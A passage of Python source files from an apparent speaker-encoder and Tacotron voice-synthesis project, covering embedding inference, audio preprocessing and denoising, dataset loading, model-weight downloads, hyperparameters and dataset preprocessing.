global _model, _device if device is None: _device = torch.device("cuda" if torch.cuda.is_available() else "cpu") elif isinstance(device, str): _device = torch.device(device) _model = SpeakerEncoder(_device, torch.device("cpu")) checkpoint = torch.load(weights_fpath, _device) _model.load_state_dict(checkpoint["model_state"]) _model.eval() print("Loaded encoder \"%s\" trained to step %d" % (weights_fpath.name, checkpoint["step"])) def is_loaded(): return _model is not None def embed_frames_batch(frames_batch): """ Computes embeddings for a batch of mel spectrogram. :param frames_batch: a batch mel of spectrogram as a numpy array of float32 of shape (batch_size, n_frames, n_channels) :return: the embeddings as a numpy array of float32 of shape (batch_size, model_embedding_size) """ if _model is None: raise Exception("Model was not loaded. Call load_model() before inference.") frames = torch.from_numpy(frames_batch).to(_device) embed = _model.forward(frames).detach().cpu().numpy() return embed def compute_partial_slices(n_samples, partial_utterance_n_frames=partials_n_frames, min_pad_coverage=0.75, overlap=0.5): """ Computes where to split an utterance waveform and its corresponding mel spectrogram to obtain partial utterances of <partial_utterance_n_frames> each. Both the waveform and the mel spectrogram slices are returned, so as to make each partial utterance waveform correspond to its spectrogram. This function assumes that the mel spectrogram parameters used are those defined in params_data.py. The returned ranges may be indexing further than the length of the waveform. It is recommended that you pad the waveform with zeros up to wave_slices[-1].stop. :param n_samples: the number of samples in the waveform :param partial_utterance_n_frames: the number of mel spectrogram frames in each partial utterance :param min_pad_coverage: when reaching the last partial utterance, it may or may not have enough frames. If at least <min_pad_coverage> of <partial_utterance_n_frames> are present, then the last partial utterance will be considered, as if we padded the audio. Otherwise, it will be discarded, as if we trimmed the audio. If there aren't enough frames for 1 partial utterance, this parameter is ignored so that the function always returns at least 1 slice. :param overlap: by how much the partial utterance should overlap. If set to 0, the partial utterances are entirely disjoint. :return: the waveform slices and mel spectrogram slices as lists of array slices. Index respectively the waveform and the mel spectrogram with these slices to obtain the partial utterances. 
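    For example (illustrative numbers, default parameters): a 2-second waveform at 16 kHz gives
    n_samples = 32000 and samples_per_frame = 160, so this function returns
    mel_slices == [slice(0, 160), slice(80, 240)] and
    wav_slices == [slice(0, 25600), slice(12800, 38400)],
    and the caller is expected to zero-pad the waveform up to 38400 samples before slicing it.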
""" assert 0 <= overlap < 1 assert 0 < min_pad_coverage <= 1 samples_per_frame = int((sampling_rate * mel_window_step / 1000)) n_frames = int(np.ceil((n_samples + 1) / samples_per_frame)) frame_step = max(int(np.round(partial_utterance_n_frames * (1 - overlap))), 1) # Compute the slices wav_slices, mel_slices = [], [] steps = max(1, n_frames - partial_utterance_n_frames + frame_step + 1) for i in range(0, steps, frame_step): mel_range = np.array([i, i + partial_utterance_n_frames]) wav_range = mel_range * samples_per_frame mel_slices.append(slice(*mel_range)) wav_slices.append(slice(*wav_range)) # Evaluate whether extra padding is warranted or not last_wav_range = wav_slices[-1] coverage = (n_samples - last_wav_range.start) / (last_wav_range.stop - last_wav_range.start) if coverage < min_pad_coverage and len(mel_slices) > 1: mel_slices = mel_slices[:-1] wav_slices = wav_slices[:-1] return wav_slices, mel_slices def embed_utterance(wav, using_partials=True, return_partials=False, **kwargs): """ Computes an embedding for a single utterance. # TODO: handle multiple wavs to benefit from batching on GPU :param wav: a preprocessed (see audio.py) utterance waveform as a numpy array of float32 :param using_partials: if True, then the utterance is split in partial utterances of <partial_utterance_n_frames> frames and the utterance embedding is computed from their normalized average. If False, the utterance is instead computed from feeding the entire spectogram to the network. :param return_partials: if True, the partial embeddings will also be returned along with the wav slices that correspond to the partial embeddings. :param kwargs: additional arguments to compute_partial_splits() :return: the embedding as a numpy array of float32 of shape (model_embedding_size,). If <return_partials> is True, the partial utterances as a numpy array of float32 of shape (n_partials, model_embedding_size) and the wav partials as a list of slices will also be returned. If <using_partials> is simultaneously set to False, both these values will be None instead. 
""" # Process the entire utterance if not using partials if not using_partials: frames = audio.wav_to_mel_spectrogram(wav) embed = embed_frames_batch(frames[None, ...])[0] if return_partials: return embed, None, None return embed # Compute where to split the utterance into partials and pad if necessary wave_slices, mel_slices = compute_partial_slices(len(wav), **kwargs) max_wave_length = wave_slices[-1].stop if max_wave_length >= len(wav): wav = np.pad(wav, (0, max_wave_length - len(wav)), "constant") # Split the utterance into partials frames = audio.wav_to_mel_spectrogram(wav) frames_batch = np.array([frames[s] for s in mel_slices]) partial_embeds = embed_frames_batch(frames_batch) # Compute the utterance embedding from the partial embeddings raw_embed = np.mean(partial_embeds, axis=0) embed = raw_embed / np.linalg.norm(raw_embed, 2) if return_partials: return embed, partial_embeds, wave_slices return embed def embed_speaker(wavs, **kwargs): raise NotImplemented() def plot_embedding_as_heatmap(embed, ax=None, title="", shape=None, color_range=(0, 0.30)): import matplotlib.pyplot as plt if ax is None: ax = plt.gca() if shape is None: height = int(np.sqrt(len(embed))) shape = (height, -1) embed = embed.reshape(shape) cmap = cm.get_cmap() mappable = ax.imshow(embed, cmap=cmap) cbar = plt.colorbar(mappable, ax=ax, fraction=0.046, pad=0.04) sm = cm.ScalarMappable(cmap=cmap) sm.set_clim(*color_range) ax.set_xticks([]), ax.set_yticks([]) ax.set_title(title) File: encoder/audio.py from scipy.ndimage.morphology import binary_dilation from encoder.params_data import * from pathlib import Path from typing import Optional, Union from warnings import warn import numpy as np import librosa import struct try: import webrtcvad except: warn("Unable to import 'webrtcvad'. This package enables noise removal and is recommended.") webrtcvad=None int16_max = (2 ** 15) - 1 def preprocess_wav(fpath_or_wav: Union[str, Path, np.ndarray], source_sr: Optional[int] = None, normalize: Optional[bool] = True, trim_silence: Optional[bool] = True): """ Applies the preprocessing operations used in training the Speaker Encoder to a waveform either on disk or in memory. The waveform will be resampled to match the data hyperparameters. :param fpath_or_wav: either a filepath to an audio file (many extensions are supported, not just .wav), either the waveform as a numpy array of floats. :param source_sr: if passing an audio waveform, the sampling rate of the waveform before preprocessing. After preprocessing, the waveform's sampling rate will match the data hyperparameters. If passing a filepath, the sampling rate will be automatically detected and this argument will be ignored. """ # Load the wav from disk if needed if isinstance(fpath_or_wav, str) or isinstance(fpath_or_wav, Path): wav, source_sr = librosa.load(str(fpath_or_wav), sr=None) else: wav = fpath_or_wav # Resample the wav if needed if source_sr is not None and source_sr != sampling_rate: wav = librosa.resample(wav, source_sr, sampling_rate) # Apply the preprocessing: normalize volume and shorten long silences if normalize: wav = normalize_volume(wav, audio_norm_target_dBFS, increase_only=True) if webrtcvad and trim_silence: wav = trim_long_silences(wav) return wav def wav_to_mel_spectrogram(wav): """ Derives a mel spectrogram ready to be used by the encoder from a preprocessed audio waveform. Note: this not a log-mel spectrogram. 
""" frames = librosa.feature.melspectrogram( wav, sampling_rate, n_fft=int(sampling_rate * mel_window_length / 1000), hop_length=int(sampling_rate * mel_window_step / 1000), n_mels=mel_n_channels ) return frames.astype(np.float32).T def trim_long_silences(wav): """ Ensures that segments without voice in the waveform remain no longer than a threshold determined by the VAD parameters in params.py. :param wav: the raw waveform as a numpy array of floats :return: the same waveform with silences trimmed away (length <= original wav length) """ # Compute the voice detection window size samples_per_window = (vad_window_length * sampling_rate) // 1000 # Trim the end of the audio to have a multiple of the window size wav = wav[:len(wav) - (len(wav) % samples_per_window)] # Convert the float waveform to 16-bit mono PCM pcm_wave = struct.pack("%dh" % len(wav), *(np.round(wav * int16_max)).astype(np.int16)) # Perform voice activation detection voice_flags = [] vad = webrtcvad.Vad(mode=3) for window_start in range(0, len(wav), samples_per_window): window_end = window_start + samples_per_window voice_flags.append(vad.is_speech(pcm_wave[window_start * 2:window_end * 2], sample_rate=sampling_rate)) voice_flags = np.array(voice_flags) # Smooth the voice detection with a moving average def moving_average(array, width): array_padded = np.concatenate((np.zeros((width - 1) // 2), array, np.zeros(width // 2))) ret = np.cumsum(array_padded, dtype=float) ret[width:] = ret[width:] - ret[:-width] return ret[width - 1:] / width audio_mask = moving_average(voice_flags, vad_moving_average_width) audio_mask = np.round(audio_mask).astype(np.bool) # Dilate the voiced regions audio_mask = binary_dilation(audio_mask, np.ones(vad_max_silence_length + 1)) audio_mask = np.repeat(audio_mask, samples_per_window) return wav[audio_mask == True] def normalize_volume(wav, target_dBFS, increase_only=False, decrease_only=False): if increase_only and decrease_only: raise ValueError("Both increase only and decrease only are set") dBFS_change = target_dBFS - 10 * np.log10(np.mean(wav ** 2)) if (dBFS_change < 0 and increase_only) or (dBFS_change > 0 and decrease_only): return wav return wav * (10 ** (dBFS_change / 20)) File: encoder/data_objects/speaker_verification_dataset.py from encoder.data_objects.random_cycler import RandomCycler from encoder.data_objects.speaker_batch import SpeakerBatch from encoder.data_objects.speaker import Speaker from encoder.params_data import partials_n_frames from torch.utils.data import Dataset, DataLoader from pathlib import Path # TODO: improve with a pool of speakers for data efficiency class SpeakerVerificationDataset(Dataset): def __init__(self, datasets_root: Path): self.root = datasets_root speaker_dirs = [f for f in self.root.glob("*") if f.is_dir()] if len(speaker_dirs) == 0: raise Exception("No speakers found. 
Make sure you are pointing to the directory " "containing all preprocessed speaker directories.") self.speakers = [Speaker(speaker_dir) for speaker_dir in speaker_dirs] self.speaker_cycler = RandomCycler(self.speakers) def __len__(self): return int(1e10) def __getitem__(self, index): return next(self.speaker_cycler) def get_logs(self): log_string = "" for log_fpath in self.root.glob("*.txt"): with log_fpath.open("r") as log_file: log_string += "".join(log_file.readlines()) return log_string class SpeakerVerificationDataLoader(DataLoader): def __init__(self, dataset, speakers_per_batch, utterances_per_speaker, sampler=None, batch_sampler=None, num_workers=0, pin_memory=False, timeout=0, worker_init_fn=None): self.utterances_per_speaker = utterances_per_speaker super().__init__( dataset=dataset, batch_size=speakers_per_batch, shuffle=False, sampler=sampler, batch_sampler=batch_sampler, num_workers=num_workers, collate_fn=self.collate, pin_memory=pin_memory, drop_last=False, timeout=timeout, worker_init_fn=worker_init_fn ) def collate(self, speakers): return SpeakerBatch(speakers, self.utterances_per_speaker, partials_n_frames) File: encoder/data_objects/speaker_batch.py import numpy as np from typing import List from encoder.data_objects.speaker import Speaker class SpeakerBatch: def __init__(self, speakers: List[Speaker], utterances_per_speaker: int, n_frames: int): self.speakers = speakers self.partials = {s: s.random_partial(utterances_per_speaker, n_frames) for s in speakers} # Array of shape (n_speakers * n_utterances, n_frames, mel_n), e.g. for 3 speakers with # 4 utterances each of 160 frames of 40 mel coefficients: (12, 160, 40) self.data = np.array([frames for s in speakers for _, frames, _ in self.partials[s]]) File: encoder/data_objects/utterance.py import numpy as np class Utterance: def __init__(self, frames_fpath, wave_fpath): self.frames_fpath = frames_fpath self.wave_fpath = wave_fpath def get_frames(self): return np.load(self.frames_fpath) def random_partial(self, n_frames): """ Crops the frames into a partial utterance of n_frames :param n_frames: The number of frames of the partial utterance :return: the partial utterance frames and a tuple indicating the start and end of the partial utterance in the complete utterance. """ frames = self.get_frames() if frames.shape[0] == n_frames: start = 0 else: start = np.random.randint(0, frames.shape[0] - n_frames) end = start + n_frames return frames[start:end], (start, end) File: encoder/data_objects/__init__.py from encoder.data_objects.speaker_verification_dataset import SpeakerVerificationDataset from encoder.data_objects.speaker_verification_dataset import SpeakerVerificationDataLoader File: encoder/data_objects/random_cycler.py import random class RandomCycler: """ Creates an internal copy of a sequence and allows access to its items in a constrained random order. For a source sequence of n items and one or several consecutive queries of a total of m items, the following guarantees hold (one implies the other): - Each item will be returned between m // n and ((m - 1) // n) + 1 times. - Between two appearances of the same item, there may be at most 2 * (n - 1) other items. 
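    Example (a sketch, outputs are random):
        cycler = RandomCycler(["a", "b", "c"])
        cycler.sample(5)   # e.g. ['c', 'a', 'b', 'b', 'a'] -- each item appears once or twice
        next(cycler)       # a single item, drawn under the same guarantees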
""" def __init__(self, source): if len(source) == 0: raise Exception("Can't create RandomCycler from an empty collection") self.all_items = list(source) self.next_items = [] def sample(self, count: int): shuffle = lambda l: random.sample(l, len(l)) out = [] while count > 0: if count >= len(self.all_items): out.extend(shuffle(list(self.all_items))) count -= len(self.all_items) continue n = min(count, len(self.next_items)) out.extend(self.next_items[:n]) count -= n self.next_items = self.next_items[n:] if len(self.next_items) == 0: self.next_items = shuffle(list(self.all_items)) return out def __next__(self): return self.sample(1)[0] File: encoder/data_objects/speaker.py from encoder.data_objects.random_cycler import RandomCycler from encoder.data_objects.utterance import Utterance from pathlib import Path # Contains the set of utterances of a single speaker class Speaker: def __init__(self, root: Path): self.root = root self.name = root.name self.utterances = None self.utterance_cycler = None def _load_utterances(self): with self.root.joinpath("_sources.txt").open("r") as sources_file: sources = [l.split(",") for l in sources_file] sources = {frames_fname: wave_fpath for frames_fname, wave_fpath in sources} self.utterances = [Utterance(self.root.joinpath(f), w) for f, w in sources.items()] self.utterance_cycler = RandomCycler(self.utterances) def random_partial(self, count, n_frames): """ Samples a batch of <count> unique partial utterances from the disk in a way that all utterances come up at least once every two cycles and in a random order every time. :param count: The number of partial utterances to sample from the set of utterances from that speaker. Utterances are guaranteed not to be repeated if <count> is not larger than the number of utterances available. :param n_frames: The number of frames in the partial utterance. :return: A list of tuples (utterance, frames, range) where utterance is an Utterance, frames are the frames of the partial utterances and range is the range of the partial utterance with regard to the complete utterance. """ if self.utterances is None: self._load_utterances() utterances = self.utterance_cycler.sample(count) a = [(u,) + u.random_partial(n_frames) for u in utterances] return a File: utils/logmmse.py # The MIT License (MIT) # # Copyright (c) 2015 braindead # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # # This code was extracted from the logmmse package (https://pypi.org/project/logmmse/) and I # simply modified the interface to meet my needs. 
import numpy as np import math from scipy.special import expn from collections import namedtuple NoiseProfile = namedtuple("NoiseProfile", "sampling_rate window_size len1 len2 win n_fft noise_mu2") def profile_noise(noise, sampling_rate, window_size=0): """ Creates a profile of the noise in a given waveform. :param noise: a waveform containing noise ONLY, as a numpy array of floats or ints. :param sampling_rate: the sampling rate of the audio :param window_size: the size of the window the logmmse algorithm operates on. A default value will be picked if left as 0. :return: a NoiseProfile object """ noise, dtype = to_float(noise) noise += np.finfo(np.float64).eps if window_size == 0: window_size = int(math.floor(0.02 * sampling_rate)) if window_size % 2 == 1: window_size = window_size + 1 perc = 50 len1 = int(math.floor(window_size * perc / 100)) len2 = int(window_size - len1) win = np.hanning(window_size) win = win * len2 / np.sum(win) n_fft = 2 * window_size noise_mean = np.zeros(n_fft) n_frames = len(noise) // window_size for j in range(0, window_size * n_frames, window_size): noise_mean += np.absolute(np.fft.fft(win * noise[j:j + window_size], n_fft, axis=0)) noise_mu2 = (noise_mean / n_frames) ** 2 return NoiseProfile(sampling_rate, window_size, len1, len2, win, n_fft, noise_mu2) def denoise(wav, noise_profile: NoiseProfile, eta=0.15): """ Cleans the noise from a speech waveform given a noise profile. The waveform must have the same sampling rate as the one used to create the noise profile. :param wav: a speech waveform as a numpy array of floats or ints. :param noise_profile: a NoiseProfile object that was created from a similar (or a segment of the same) waveform. :param eta: voice threshold for noise update. While the voice activation detection value is below this threshold, the noise profile will be continuously updated throughout the audio. Set to 0 to disable updating the noise profile. :return: the clean wav as a numpy array of floats or ints of the same length. """ wav, dtype = to_float(wav) wav += np.finfo(np.float64).eps p = noise_profile nframes = int(math.floor(len(wav) / p.len2) - math.floor(p.window_size / p.len2)) x_final = np.zeros(nframes * p.len2) aa = 0.98 mu = 0.98 ksi_min = 10 ** (-25 / 10) x_old = np.zeros(p.len1) xk_prev = np.zeros(p.len1) noise_mu2 = p.noise_mu2 for k in range(0, nframes * p.len2, p.len2): insign = p.win * wav[k:k + p.window_size] spec = np.fft.fft(insign, p.n_fft, axis=0) sig = np.absolute(spec) sig2 = sig ** 2 gammak = np.minimum(sig2 / noise_mu2, 40) if xk_prev.all() == 0: ksi = aa + (1 - aa) * np.maximum(gammak - 1, 0) else: ksi = aa * xk_prev / noise_mu2 + (1 - aa) * np.maximum(gammak - 1, 0) ksi = np.maximum(ksi_min, ksi) log_sigma_k = gammak * ksi/(1 + ksi) - np.log(1 + ksi) vad_decision = np.sum(log_sigma_k) / p.window_size if vad_decision < eta: noise_mu2 = mu * noise_mu2 + (1 - mu) * sig2 a = ksi / (1 + ksi) vk = a * gammak ei_vk = 0.5 * expn(1, np.maximum(vk, 1e-8)) hw = a * np.exp(ei_vk) sig = sig * hw xk_prev = sig ** 2 xi_w = np.fft.ifft(hw * spec, p.n_fft, axis=0) xi_w = np.real(xi_w) x_final[k:k + p.len2] = x_old + xi_w[0:p.len1] x_old = xi_w[p.len1:p.window_size] output = from_float(x_final, dtype) output = np.pad(output, (0, len(wav) - len(output)), mode="constant") return output ## Alternative VAD algorithm to webrctvad. It has the advantage of not requiring to install that ## darn package and it also works for any sampling rate. 
Maybe I'll eventually use it instead of ## webrctvad # def vad(wav, sampling_rate, eta=0.15, window_size=0): # """ # TODO: fix doc # Creates a profile of the noise in a given waveform. # # :param wav: a waveform containing noise ONLY, as a numpy array of floats or ints. # :param sampling_rate: the sampling rate of the audio # :param window_size: the size of the window the logmmse algorithm operates on. A default value # will be picked if left as 0. # :param eta: voice threshold for noise update. While the voice activation detection value is # below this threshold, the noise profile will be continuously updated throughout the audio. # Set to 0 to disable updating the noise profile. # """ # wav, dtype = to_float(wav) # wav += np.finfo(np.float64).eps # # if window_size == 0: # window_size = int(math.floor(0.02 * sampling_rate)) # # if window_size % 2 == 1: # window_size = window_size + 1 # # perc = 50 # len1 = int(math.floor(window_size * perc / 100)) # len2 = int(window_size - len1) # # win = np.hanning(window_size) # win = win * len2 / np.sum(win) # n_fft = 2 * window_size # # wav_mean = np.zeros(n_fft) # n_frames = len(wav) // window_size # for j in range(0, window_size * n_frames, window_size): # wav_mean += np.absolute(np.fft.fft(win * wav[j:j + window_size], n_fft, axis=0)) # noise_mu2 = (wav_mean / n_frames) ** 2 # # wav, dtype = to_float(wav) # wav += np.finfo(np.float64).eps # # nframes = int(math.floor(len(wav) / len2) - math.floor(window_size / len2)) # vad = np.zeros(nframes * len2, dtype=np.bool) # # aa = 0.98 # mu = 0.98 # ksi_min = 10 ** (-25 / 10) # # xk_prev = np.zeros(len1) # noise_mu2 = noise_mu2 # for k in range(0, nframes * len2, len2): # insign = win * wav[k:k + window_size] # # spec = np.fft.fft(insign, n_fft, axis=0) # sig = np.absolute(spec) # sig2 = sig ** 2 # # gammak = np.minimum(sig2 / noise_mu2, 40) # # if xk_prev.all() == 0: # ksi = aa + (1 - aa) * np.maximum(gammak - 1, 0) # else: # ksi = aa * xk_prev / noise_mu2 + (1 - aa) * np.maximum(gammak - 1, 0) # ksi = np.maximum(ksi_min, ksi) # # log_sigma_k = gammak * ksi / (1 + ksi) - np.log(1 + ksi) # vad_decision = np.sum(log_sigma_k) / window_size # if vad_decision < eta: # noise_mu2 = mu * noise_mu2 + (1 - mu) * sig2 # print(vad_decision) # # a = ksi / (1 + ksi) # vk = a * gammak # ei_vk = 0.5 * expn(1, np.maximum(vk, 1e-8)) # hw = a * np.exp(ei_vk) # sig = sig * hw # xk_prev = sig ** 2 # # vad[k:k + len2] = vad_decision >= eta # # vad = np.pad(vad, (0, len(wav) - len(vad)), mode="constant") # return vad def to_float(_input): if _input.dtype == np.float64: return _input, _input.dtype elif _input.dtype == np.float32: return _input.astype(np.float64), _input.dtype elif _input.dtype == np.uint8: return (_input - 128) / 128., _input.dtype elif _input.dtype == np.int16: return _input / 32768., _input.dtype elif _input.dtype == np.int32: return _input / 2147483648., _input.dtype raise ValueError('Unsupported wave file format') def from_float(_input, dtype): if dtype == np.float64: return _input, np.float64 elif dtype == np.float32: return _input.astype(np.float32) elif dtype == np.uint8: return ((_input * 128) + 128).astype(np.uint8) elif dtype == np.int16: return (_input * 32768).astype(np.int16) elif dtype == np.int32: print(_input) return (_input * 2147483648).astype(np.int32) raise ValueError('Unsupported wave file format') File: utils/__init__.py File: utils/default_models.py import urllib.request from pathlib import Path from threading import Thread from urllib.error import HTTPError from tqdm import tqdm 
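
# Hypothetical usage sketch (commented out; "saved_models" is only an illustrative
# directory name). ensure_default_models(), defined below, downloads any missing or
# wrongly-sized default model into <models_dir>/default/.
#
#   from pathlib import Path
#   ensure_default_models(Path("saved_models"))
#   # -> saved_models/default/encoder.pt, synthesizer.pt and vocoder.pt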
default_models = { "encoder": ("https://drive.google.com/uc?export=download&id=1q8mEGwCkFy23KZsinbuvdKAQLqNKbYf1", 17090379), "synthesizer": ("https://drive.google.com/u/0/uc?id=1EqFMIbvxffxtjiVrtykroF6_mUh-5Z3s&export=download&confirm=t", 370554559), "vocoder": ("https://drive.google.com/uc?export=download&id=1cf2NO6FtI0jDuy8AV3Xgn6leO6dHjIgu", 53845290), } class DownloadProgressBar(tqdm): def update_to(self, b=1, bsize=1, tsize=None): if tsize is not None: self.total = tsize self.update(b * bsize - self.n) def download(url: str, target: Path, bar_pos=0): # Ensure the directory exists target.parent.mkdir(exist_ok=True, parents=True) desc = f"Downloading {target.name}" with DownloadProgressBar(unit="B", unit_scale=True, miniters=1, desc=desc, position=bar_pos, leave=False) as t: try: urllib.request.urlretrieve(url, filename=target, reporthook=t.update_to) except HTTPError: return def ensure_default_models(models_dir: Path): # Define download tasks jobs = [] for model_name, (url, size) in default_models.items(): target_path = models_dir / "default" / f"{model_name}.pt" if target_path.exists(): if target_path.stat().st_size != size: print(f"File {target_path} is not of expected size, redownloading...") else: continue thread = Thread(target=download, args=(url, target_path, len(jobs))) thread.start() jobs.append((thread, target_path, size)) # Run and join threads for thread, target_path, size in jobs: thread.join() assert target_path.exists() and target_path.stat().st_size == size, \ f"Download for {target_path.name} failed. You may download models manually instead.\n" \ f"https://drive.google.com/drive/folders/1fU6umc5uQAVR2udZdHX-lDgXYzTyqG_j" File: utils/profiler.py from time import perf_counter as timer from collections import OrderedDict import numpy as np class Profiler: def __init__(self, summarize_every=5, disabled=False): self.last_tick = timer() self.logs = OrderedDict() self.summarize_every = summarize_every self.disabled = disabled def tick(self, name): if self.disabled: return # Log the time needed to execute that function if not name in self.logs: self.logs[name] = [] if len(self.logs[name]) >= self.summarize_every: self.summarize() self.purge_logs() self.logs[name].append(timer() - self.last_tick) self.reset_timer() def purge_logs(self): for name in self.logs: self.logs[name].clear() def reset_timer(self): self.last_tick = timer() def summarize(self): n = max(map(len, self.logs.values())) assert n == self.summarize_every print("\nAverage execution time over %d steps:" % n) name_msgs = ["%s (%d/%d):" % (name, len(deltas), n) for name, deltas in self.logs.items()] pad = max(map(len, name_msgs)) for name_msg, deltas in zip(name_msgs, self.logs.values()): print(" %s mean: %4.0fms std: %4.0fms" % (name_msg.ljust(pad), np.mean(deltas) * 1000, np.std(deltas) * 1000)) print("", flush=True) File: utils/argutils.py from pathlib import Path import numpy as np import argparse _type_priorities = [ # In decreasing order Path, str, int, float, bool, ] def _priority(o): p = next((i for i, t in enumerate(_type_priorities) if type(o) is t), None) if p is not None: return p p = next((i for i, t in enumerate(_type_priorities) if isinstance(o, t)), None) if p is not None: return p return len(_type_priorities) def print_args(args: argparse.Namespace, parser=None): args = vars(args) if parser is None: priorities = list(map(_priority, args.values())) else: all_params = [a.dest for g in parser._action_groups for a in g._group_actions ] priority = lambda p: all_params.index(p) if p in all_params else 
len(all_params) priorities = list(map(priority, args.keys())) pad = max(map(len, args.keys())) + 3 indices = np.lexsort((list(args.keys()), priorities)) items = list(args.items()) print("Arguments:") for i in indices: param, value = items[i] print(" {0}:{1}{2}".format(param, ' ' * (pad - len(param)), value)) print("") File: synthesizer/hparams.py import ast import pprint class HParams(object): def __init__(self, **kwargs): self.__dict__.update(kwargs) def __setitem__(self, key, value): setattr(self, key, value) def __getitem__(self, key): return getattr(self, key) def __repr__(self): return pprint.pformat(self.__dict__) def parse(self, string): # Overrides hparams from a comma-separated string of name=value pairs if len(string) > 0: overrides = [s.split("=") for s in string.split(",")] keys, values = zip(*overrides) keys = list(map(str.strip, keys)) values = list(map(str.strip, values)) for k in keys: self.__dict__[k] = ast.literal_eval(values[keys.index(k)]) return self hparams = HParams( ### Signal Processing (used in both synthesizer and vocoder) sample_rate = 16000, n_fft = 800, num_mels = 80, hop_size = 200, # Tacotron uses 12.5 ms frame shift (set to sample_rate * 0.0125) win_size = 800, # Tacotron uses 50 ms frame length (set to sample_rate * 0.050) fmin = 55, min_level_db = -100, ref_level_db = 20, max_abs_value = 4., # Gradient explodes if too big, premature convergence if too small. preemphasis = 0.97, # Filter coefficient to use if preemphasize is True preemphasize = True, ### Tacotron Text-to-Speech (TTS) tts_embed_dims = 512, # Embedding dimension for the graphemes/phoneme inputs tts_encoder_dims = 256, tts_decoder_dims = 128, tts_postnet_dims = 512, tts_encoder_K = 5, tts_lstm_dims = 1024, tts_postnet_K = 5, tts_num_highways = 4, tts_dropout = 0.5, tts_cleaner_names = ["english_cleaners"], tts_stop_threshold = -3.4, # Value below which audio generation ends. # For example, for a range of [-4, 4], this # will terminate the sequence at the first # frame that has all values < -3.4 ### Tacotron Training tts_schedule = [(2, 1e-3, 20_000, 12), # Progressive training schedule (2, 5e-4, 40_000, 12), # (r, lr, step, batch_size) (2, 2e-4, 80_000, 12), # (2, 1e-4, 160_000, 12), # r = reduction factor (# of mel frames (2, 3e-5, 320_000, 12), # synthesized for each decoder iteration) (2, 1e-5, 640_000, 12)], # lr = learning rate tts_clip_grad_norm = 1.0, # clips the gradient norm to prevent explosion - set to None if not needed tts_eval_interval = 500, # Number of steps between model evaluation (sample generation) # Set to -1 to generate after completing epoch, or 0 to disable tts_eval_num_samples = 1, # Makes this number of samples ### Data Preprocessing max_mel_frames = 900, rescale = True, rescaling_max = 0.9, synthesis_batch_size = 16, # For vocoder preprocessing and inference. 
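
    # Any of the values above or below can be overridden at runtime through HParams.parse
    # (defined above), which reads a comma-separated "name=value" string with
    # ast.literal_eval, e.g. (a hypothetical override):
    #   hparams.parse("rescale=False,max_mel_frames=600")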
### Mel Visualization and Griffin-Lim signal_normalization = True, power = 1.5, griffin_lim_iters = 60, ### Audio processing options fmax = 7600, # Should not exceed (sample_rate // 2) allow_clipping_in_normalization = True, # Used when signal_normalization = True clip_mels_length = True, # If true, discards samples exceeding max_mel_frames use_lws = False, # "Fast spectrogram phase recovery using local weighted sums" symmetric_mels = True, # Sets mel range to [-max_abs_value, max_abs_value] if True, # and [0, max_abs_value] if False trim_silence = True, # Use with sample_rate of 16000 for best results ### SV2TTS speaker_embedding_size = 256, # Dimension for the speaker embedding silence_min_duration_split = 0.4, # Duration in seconds of a silence for an utterance to be split utterance_min_duration = 1.6, # Duration in seconds below which utterances are discarded ) def hparams_debug_string(): return str(hparams) File: synthesizer/preprocess.py from multiprocessing.pool import Pool from synthesizer import audio from functools import partial from itertools import chain from encoder import inference as encoder from pathlib import Path from utils import logmmse from tqdm import tqdm import numpy as np import librosa def preprocess_dataset(datasets_root: Path, out_dir: Path, n_processes: int, skip_existing: bool, hparams, no_alignments: bool, datasets_name: str, subfolders: str): # Gather the input directories dataset_root = datasets_root.joinpath(datasets_name) input_dirs = [dataset_root.joinpath(subfolder.strip()) for subfolder in subfolders.split(",")] print("\n ".join(map(str, ["Using data from:"] + input_dirs))) assert all(input_dir.exists() for input_dir in input_dirs) # Create the output directories for each output file type out_dir.joinpath("mels").mkdir(exist_ok=True) out_dir.joinpath("audio").mkdir(exist_ok=True) # Create a metadata file metadata_fpath = out_dir.joinpath("train.txt") metadata_file = metadata_fpath.open("a" if skip_existing else "w", encoding="utf-8") # Preprocess the dataset speaker_dirs = list(chain.from_iterable(input_dir.glob("*") for input_dir in input_dirs)) func = partial(preprocess_speaker, out_dir=out_dir, skip_existing=skip_existing, hparams=hparams, no_alignments=no_alignments) job = Pool(n_processes).imap(func, speaker_dirs) for speaker_metadata in tqdm(job, datasets_name, len(speaker_dirs), unit="speakers"): for metadatum in speaker_metadata: metadata_file.write("|".join(str(x) for x in metadatum) + "\n") metadata_file.close() # Verify the contents of the metadata file with metadata_fpath.open("r", encoding="utf-8") as metadata_file: metadata = [line.split("|") for line in metadata_file] mel_frames = sum([int(m[4]) for m in metadata]) timesteps = sum([int(m[3]) for m in metadata]) sample_rate = hparams.sample_rate hours = (timesteps / sample_rate) / 3600 print("The dataset consists of %d utterances, %d mel frames, %d audio timesteps (%.2f hours)." 
